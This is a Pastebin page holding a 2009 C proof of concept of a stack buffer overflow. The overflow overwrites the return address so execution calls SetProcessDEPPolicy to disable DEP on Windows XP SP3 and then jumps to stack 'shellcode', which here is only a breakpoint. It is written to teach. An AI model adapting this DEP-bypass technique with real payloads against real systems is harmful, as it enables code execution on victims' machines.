API tools faq
paste
Advertisement
Guest User

Bernardo

a guest
Dec 9th, 2009
3,968
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.65 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. This is a proof of concept of buffer overflow exploitation with DEP
  3. bypass on Windows XP Professional SP3 english updated on December 9,
  4. 2009 with DEP manually set to OptOut so enabled for all processes,
  5. except the ones that are put in the exception list and this program
  6. is not.
  7.  
  8. This source has been compiled with Microsoft Visual C++ 2008 Express
  9. Edition in Release mode with the default flags. This includes
  10. /NXCOMPAT and /GS.
  11.  
  12. Buffer Security Check (stack cookie, /GS flag) does not need to be
  13. bypassed because the string buffer, buf, in this example is long
  14. 4 bytes, so the compiler does not add the GS cookie to the
  15. useSetProcessDEPPolicy() function. Remember that strict_gs_check
  16. pragma by default is turned off.
  17.  
  18. References:
  19. * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
  20.   Server 2008' by Michael Howard,
  21.   http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
  22. * SetProcessDEPPolicy Function,
  23.   http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx
  24.  
  25. Feel free to write me for comments and questions,
  26. Bernardo Damele A. G. <[email protected]>
  27. */
  28.  
  29.  
  30. #include <windows.h>
  31. #include <stdlib.h>
  32.  
  33.  
  34. void useSetProcessDEPPolicy()
  35. {
  36.     char buf[4];
  37.  
  38.     /* Overflow the string buffer and EBP register. */
  39.     strcpy(buf, "AAAABBBB");
  40.  
  41.     /* SetProcessDEPPolicy() API has been added to Windows Vista SP1,
  42.     Windows XP SP3 and Windows Server 2008 and can be abused by an
  43.     attacker while exploiting a buffer overflow vulnerability to disable
  44.     hardware-enforced DEP (NX/XD bit) for the running process.
  45.  
  46.     Overwrite EIP with the address of SetProcessDepPolicy() API, which
  47.     is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
  48.     December 9, 2009.
  49.  
  50.     NOTE: You might need to adapt it depending on your system patch
  51.     level. */
  52. @@    memcpy(buf+8, "\xa4\x22\x86\x7c", 4);
  53.  
  54.     /* Return address of SetProcessDepPolicy().
  55.     Use an address of a JMP ESP instruction in kernel32.dll to jump to our
  56.     shellcode on the top of the stack.
  57.  
  58.     NOTE: You might need to adapt it depending on your system patch
  59.     level. */
  60.     memcpy(buf+12, "\x13\x44\x87\x7c", 4);
  61.  
  62.     /* Argument for SetProcessDepPolicy().
  63.     0x00000000 turn off DEP for this process. */
  64. @@    memcpy(buf+16, "\x00\x00\x00\x00", 4);
  65.  
  66.     /* The shellcode to be executed after DEP has been disabled.
  67.     For instance, a breakpoint (INT 3 instruction) to call the
  68.     debug exception handler which will pause the process. */
  69.     memcpy(buf+20, "\xcc", 1);
  70. }
  71.  
  72.  
  73. int main()
  74. {
  75.     useSetProcessDEPPolicy();
  76.  
  77.     return 0;
  78. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!